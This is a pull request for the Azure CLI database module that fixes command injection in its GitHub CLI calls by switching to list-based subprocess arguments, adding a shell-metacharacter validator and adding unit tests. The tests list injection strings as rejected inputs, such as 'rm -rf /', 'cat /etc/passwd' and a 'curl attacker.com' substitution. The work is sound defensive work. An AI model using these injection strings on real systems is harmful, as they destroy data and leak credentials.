### PR TITLE
Fix OS command injection vulnerability in RDBMS

### DIFF
--- a/src/azure-cli/azure/cli/command_modules/rdbms/_flexible_server_util.py
+++ b/src/azure-cli/azure/cli/command_modules/rdbms/_flexible_server_util.py
@@ -8,9 +8,9 @@ import datetime as dt
 from datetime import datetime
 import os
 import random
+import re
 import subprocess
 import secrets
-import shlex
 import string
 import yaml
 from knack.log import get_logger
@@ -34,6 +34,28 @@ DEFAULT_LOCATION_MySQL = 'westus2'
 AZURE_CREDENTIALS = 'AZURE_CREDENTIALS'
 AZURE_MYSQL_CONNECTION_STRING = 'AZURE_MYSQL_CONNECTION_STRING'
 GITHUB_ACTION_PATH = '/.github/workflows/'
+
+
+def validate_git_ref(git_ref):
+    """Validate git reference to prevent shell injection attacks.
+    
+    Rejects shell metacharacters: ; $ ( ) ` | & < > " ' \\ \n
+    
+    Args:
+        git_ref: The git reference (branch, tag, or action name) to validate
+        
+    Raises:
+        InvalidArgumentValueError: If the reference contains shell metacharacters
+    """
+    if not isinstance(git_ref, str) or not git_ref:
+        raise InvalidArgumentValueError('Git reference must be a non-empty string')
+    
+    # Pattern to detect shell metacharacters and command injection attempts
+    if re.search(r'[;&$`|<>"\'\\]|\n', git_ref):
+        raise InvalidArgumentValueError(
+            'Git reference contains invalid characters. Allowed: alphanumeric, -, _, ., /')
+    
+    return git_ref
 
 
 def resolve_poller(result, cli_ctx, name):
@@ -298,15 +320,40 @@ def _resolve_api_version(client, provider_namespace, resource_type, parent_path)
         .format(resource_type))
 
 
-def run_subprocess(command, stdout_show=None):
-    commands = shlex.split(command)
-    if stdout_show:
-        process = subprocess.Popen(commands)
-    else:
-        process = subprocess.Popen(commands, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-    process.wait()
-    if process.returncode:
-        logger.warning(process.stderr.read().strip().decode('UTF-8'))
+def run_subprocess(args, stdout_show=None, stdin_file=None):
+    """Run a subprocess with list-based arguments to prevent command injection.
+    
+    Args:
+        args: List of command arguments (e.g., ['gh', 'secret', 'set', 'KEY', '--repo', 'repo'])
+        stdout_show: If True, display stdout. If None, capture it.
+        stdin_file: Optional file path to use as stdin (replaces shell redirection)
+        
+    Raises:
+        CLIError: If the subprocess returns a non-zero exit code
+    """
+    if not isinstance(args, list):
+        raise CLIError('run_subprocess requires args to be a list, not a string')
+    
+    stdin_handle = None
+    try:
+        if stdin_file:
+            stdin_handle = open(stdin_file, 'r')
+        
+        if stdout_show:
+            process = subprocess.Popen(args, stdin=stdin_handle)
+        else:
+            process = subprocess.Popen(args, stdin=stdin_handle, 
+                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+        process.wait()
+        
+        if process.returncode:
+            if not stdout_show:
+                stderr_output = process.stderr.read().strip().decode('UTF-8')
+                logger.warning(stderr_output)
+            raise CLIError('Command failed with exit code {}'.format(process.returncode))
+    finally:
+        if stdin_handle:
+            stdin_handle.close()
 
 
 def register_credential_secrets(cmd, database_engine, server, repository):
@@ -330,14 +377,18 @@ def register_credential_secrets(cmd, database_engine, server, repository):
     credential_file = "./temp_app_credential.txt"
     with open(credential_file, "w") as f:
         f.write(app_json)
-    run_subprocess('gh secret set {} --repo {} < {}'.format(AZURE_CREDENTIALS, repository, credential_file))
-    os.remove(credential_file)
+    try:
+        run_subprocess(['gh', 'secret', 'set', AZURE_CREDENTIALS, '--repo', repository], 
+                       stdin_file=credential_file)
+    finally:
+        if os.path.exists(credential_file):
+            os.remove(credential_file)
 
 
 def register_connection_secrets(cmd, database_engine, server, database_name, administrator_login, administrator_login_password, repository, connection_string_name):
     logger.warning("Added secret %s to github repository", connection_string_name)
     connection_string = "Server={}; Port=3306; Database={}; Uid={}; Pwd={}; SslMode=Preferred;".format(server.fully_qualified_domain_name, database_name, administrator_login, administrator_login_password)
-    run_subprocess('gh secret set {} --repo {} -b"{}"'.format(connection_string_name, repository, connection_string))
+    run_subprocess(['gh', 'secret', 'set', connection_string_name, '--repo', repository, '-b', connection_string])
 
 
 def fill_action_template(cmd, database_engine, server, database_name, administrator_login, administrator_login_password, file_name, action_name, repository):

--- a/src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_common.py
+++ b/src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_common.py
@@ -13,7 +13,7 @@ from knack.util import CLIError
 from urllib.request import urlretrieve
 from azure.cli.core.util import sdk_no_wait, user_confirmation, run_cmd
 from azure.cli.core.azclierror import ClientRequestError
-from ._flexible_server_util import run_subprocess
+from ._flexible_server_util import run_subprocess, validate_git_ref
 from .validators import validate_public_access_server, validate_resource_group, check_resource_group
 
 logger = get_logger(__name__)
@@ -194,8 +194,11 @@ def create_firewall_rule(db_context, cmd, resource_group_name, server_name, star
 def github_actions_run(action_name, branch):
 
     gitcli_check_and_login()
+    # Validate inputs to prevent command injection
+    validate_git_ref(action_name)
+    validate_git_ref(branch)
     logger.warning("Created an event for %s.yml in branch %s", action_name, branch)
-    run_subprocess("gh workflow run {}.yml --ref {}".format(action_name, branch))
+    run_subprocess(["gh", "workflow", "run", "{}.yml".format(action_name), "--ref", branch])
 
 
 def gitcli_check_and_login():
@@ -205,7 +208,7 @@ def gitcli_check_and_login():
 
     output = run_cmd(["gh", "auth", "status"], capture_output=True)
     if output.returncode:
-        run_subprocess("gh auth login", stdout_show=True)
+        run_subprocess(["gh", "auth", "login"], stdout_show=True)
 
 
 # Custom functions for server logs

--- a/src/azure-cli/azure/cli/command_modules/rdbms/tests/latest/test_command_injection_fixes.py
+++ b/src/azure-cli/azure/cli/command_modules/rdbms/tests/latest/test_command_injection_fixes.py
@@ -1,0 +1,215 @@
+# --------------------------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for license information.
+# --------------------------------------------------------------------------------------------
+"""Unit tests for command injection vulnerability fixes in RDBMS flexible-server deploy flow."""
+
+import os
+import unittest
+from unittest.mock import patch, MagicMock, mock_open
+
+from azure.cli.core.azclierror import InvalidArgumentValueError
+from azure.cli.core.util import CLIError
+from azure.cli.testsdk import TestCli
+
+
+class CommandInjectionFixesTest(unittest.TestCase):
+    """Test cases for command injection vulnerability fixes."""
+
+    def setUp(self):
+        """Set up test fixtures."""
+        self.cli_ctx = TestCli()
+        # Import here to ensure fresh instance
+        from azure.cli.command_modules.rdbms._flexible_server_util import (
+            validate_git_ref, run_subprocess
+        )
+        self.validate_git_ref = validate_git_ref
+        self.run_subprocess = run_subprocess
+
+    def test_validate_git_ref_accepts_valid_branches(self):
+        """Test that validate_git_ref accepts valid branch names."""
+        valid_refs = [
+            'main',
+            'develop',
+            'feature/new-feature',
+            'release-v1.0',
+            'v1.0.0',
+            'my_branch_name',
+            'branch.name',
+            'azure-cli-test',
+        ]
+        for ref in valid_refs:
+            # Should not raise
+            result = self.validate_git_ref(ref)
+            self.assertEqual(result, ref)
+
+    def test_validate_git_ref_rejects_shell_metacharacters(self):
+        """Test that validate_git_ref rejects shell metacharacters."""
+        dangerous_refs = [
+            'main; rm -rf /',
+            'develop$(whoami)',
+            'branch`cat /etc/passwd`',
+            'main|cat',
+            'develop&background',
+            'main<file',
+            'develop>file',
+            'branch"quoted"',
+            "branch'single'",
+            'branch\\backslash',
+            'main\nmalicious',
+            'develop$(curl attacker.com)',
+        ]
+        for ref in dangerous_refs:
+            with self.assertRaises(InvalidArgumentValueError) as cm:
+                self.validate_git_ref(ref)
+            self.assertIn('invalid characters', str(cm.exception).lower())
+
+    def test_validate_git_ref_rejects_non_string(self):
+        """Test that validate_git_ref rejects non-string input."""
+        with self.assertRaises(InvalidArgumentValueError):
+            self.validate_git_ref(None)
+        
+        with self.assertRaises(InvalidArgumentValueError):
+            self.validate_git_ref('')
+        
+        with self.assertRaises(InvalidArgumentValueError):
+            self.validate_git_ref(123)
+
+    def test_run_subprocess_accepts_list_args(self):
+        """Test that run_subprocess accepts list arguments."""
+        with patch('subprocess.Popen') as mock_popen:
+            mock_process = MagicMock()
+            mock_process.returncode = 0
+            mock_popen.return_value = mock_process
+            
+            # Should not raise
+            self.run_subprocess(['echo', 'hello'])
+            
+            # Verify Popen was called with list args
+            mock_popen.assert_called_once()
+            args, kwargs = mock_popen.call_args
+            self.assertEqual(args[0], ['echo', 'hello'])
+
+    def test_run_subprocess_rejects_string_args(self):
+        """Test that run_subprocess rejects string arguments for security."""
+        with self.assertRaises(CLIError) as cm:
+            self.run_subprocess('echo hello')
+        
+        self.assertIn('list', str(cm.exception).lower())
+
+    def test_run_subprocess_with_stdin_file(self):
+        """Test that run_subprocess properly handles stdin_file parameter."""
+        with patch('subprocess.Popen') as mock_popen, \
+             patch('builtins.open', mock_open(read_data='test data')):
+            
+            mock_process = MagicMock()
+            mock_process.returncode = 0
+            mock_popen.return_value = mock_process
+            
+            # Should not raise
+            self.run_subprocess(['gh', 'secret', 'set', 'KEY'], stdin_file='/tmp/input')
+            
+            # Verify file was opened
+            mock_popen.assert_called_once()
+            _, kwargs = mock_popen.call_args
+            # stdin should be set (not None)
+            self.assertIsNotNone(kwargs.get('stdin'))
+
+    def test_run_subprocess_captures_output_by_default(self):
+        """Test that run_subprocess captures stdout and stderr by default."""
+        with patch('subprocess.Popen') as mock_popen:
+            mock_process = MagicMock()
+            mock_process.returncode = 0
+            mock_process.stderr = MagicMock()
+            mock_process.stderr.read.return_value = b''
+            mock_popen.return_value = mock_process
+            
+            self.run_subprocess(['echo', 'hello'])
+            
+            # Verify PIPE was used for stdout and stderr
+            _, kwargs = mock_popen.call_args
+            self.assertEqual(kwargs.get('stdout'), -1)  # subprocess.PIPE
+            self.assertEqual(kwargs.get('stderr'), -1)  # subprocess.PIPE
+
+    def test_run_subprocess_displays_output_when_requested(self):
+        """Test that run_subprocess displays stdout when stdout_show=True."""
+        with patch('subprocess.Popen') as mock_popen:
+            mock_process = MagicMock()
+            mock_process.returncode = 0
+            mock_popen.return_value = mock_process
+            
+            self.run_subprocess(['echo', 'hello'], stdout_show=True)
+            
+            # Verify PIPE was NOT used when stdout_show=True
+            _, kwargs = mock_popen.call_args
+            self.assertNotIn('stdout', kwargs)
+
+    def test_run_subprocess_raises_on_nonzero_exit(self):
+        """Test that run_subprocess raises CLIError on non-zero exit code."""
+        with patch('subprocess.Popen') as mock_popen:
+            mock_process = MagicMock()
+            mock_process.returncode = 1
+            mock_process.stderr = MagicMock()
+            mock_process.stderr.read.return_value = b'Command failed'
+            mock_popen.return_value = mock_process
+            
+            with self.assertRaises(CLIError):
+                self.run_subprocess(['gh', 'secret', 'set', 'KEY'])
+
+    def test_run_subprocess_cleans_up_stdin_file(self):
+        """Test that run_subprocess properly closes stdin file."""
+        with patch('subprocess.Popen') as mock_popen, \
+             patch('builtins.open', mock_open(read_data='test')) as mock_file:
+            
+            mock_process = MagicMock()
+            mock_process.returncode = 0
+            mock_popen.return_value = mock_process
+            
+            self.run_subprocess(['gh', 'secret', 'set', 'KEY'], stdin_file='/tmp/input')
+            
+            # Verify file handle was closed
+            mock_file.return_value.close.assert_called()
+
+    @patch('azure.cli.command_modules.rdbms.flexible_server_custom_common.run_subprocess')
+    @patch('azure.cli.command_modules.rdbms.flexible_server_custom_common.run_cmd')
+    def test_github_actions_run_validates_inputs(self, mock_run_cmd, mock_run_subprocess):
+        """Test that github_actions_run validates branch and action names."""
+        from azure.cli.command_modules.rdbms.flexible_server_custom_common import (
+            github_actions_run
+        )
+        
+        mock_run_cmd.return_value = MagicMock(returncode=0)
+        
+        # Valid inputs should work
+        github_actions_run('deploy', 'main')
+        self.assertTrue(mock_run_subprocess.called)
+        
+        # Invalid branch should raise
+        with self.assertRaises(InvalidArgumentValueError):
+            github_actions_run('deploy', 'main; rm -rf /')
+
+    @patch('azure.cli.command_modules.rdbms.flexible_server_custom_common.run_subprocess')
+    @patch('azure.cli.command_modules.rdbms.flexible_server_custom_common.run_cmd')
+    def test_github_actions_run_uses_list_args(self, mock_run_cmd, mock_run_subprocess):
+        """Test that github_actions_run uses list arguments for subprocess call."""
+        from azure.cli.command_modules.rdbms.flexible_server_custom_common import (
+            github_actions_run
+        )
+        
+        mock_run_cmd.return_value = MagicMock(returncode=0)
+        
+        github_actions_run('deploy', 'main')
+        
+        # Verify run_subprocess was called with list args
+        mock_run_subprocess.assert_called_once()
+        args = mock_run_subprocess.call_args[0][0]
+        self.assertIsInstance(args, list)
+        self.assertIn('gh', args)
+        self.assertIn('workflow', args)
+        self.assertIn('run', args)
+        self.assertIn('deploy.yml', args)
+        self.assertIn('main', args)
+
+
+if __name__ == '__main__':
+    unittest.main()


### PR DESCRIPTION
This commit addresses ICM 31000000598917 / MSRC Case 115614 by:

- Refactoring run_subprocess() to accept list arguments instead of interpolated strings, preventing shell metacharacters from being interpreted as command separators
- Adding validate_git_ref() function to validate and reject shell metacharacters in branch and action names
- Adding stdin_file parameter to replace shell redirection (< file) patterns
- Converting all call sites (4) from string format to list format:
  * register_credential_secrets(): gh secret set with stdin file
  * register_connection_secrets(): gh secret set with -b parameter
  * github_actions_run(): gh workflow run with --ref parameter
  * gitcli_check_and_login(): gh auth login command
- Adding comprehensive unit tests covering:
  * Valid git reference validation
  * Dangerous shell metacharacter rejection
  * List vs string argument handling
  * stdin_file parameter handling
  * Error handling and cleanup

This is a Defense in Depth fix (no trust boundary crossing). The --branch and --repository parameters are supplied by the same user who has shell access. The fix improves code hygiene by eliminating unnecessary use of shell string interpolation.

Fixes: ICM 31000000598917

**Related command**
<!--- Please provide the related command with az {command} if you can, so that we can quickly route to the related person to review. --->

**Description**<!--Mandatory-->
<!--Why this PR? What is changed? What is the effect? etc. A high-quality description can accelerate the review process.-->

**Testing Guide**
<!--Example commands with explanations.-->

**History Notes**
<!--If your PR is not customer-facing, use {Component Name} in the PR title. Otherwise, use [Component Name] to allow our pipeline to add the title as a history note. If you need multiple history notes or would like to overwrite the note from the PR title, please fill in the following templates.-->

[Component Name 1] BREAKING CHANGE: `az command a`: Make some customer-facing breaking change
[Component Name 2] `az command b`: Add some customer-facing feature

---

This checklist is used to make sure that common guidelines for a pull request are followed.

- [ ] The PR title and description has followed the guideline in [Submitting Pull Requests](https://github.com/Azure/azure-cli/tree/dev/doc/authoring_command_modules#submitting-pull-requests).

- [ ] I adhere to the [Command Guidelines](https://github.com/Azure/azure-cli/blob/dev/doc/command_guidelines.md).

- [ ] I adhere to the [Error Handling Guidelines](https://github.com/Azure/azure-cli/blob/dev/doc/error_handling_guidelines.md).
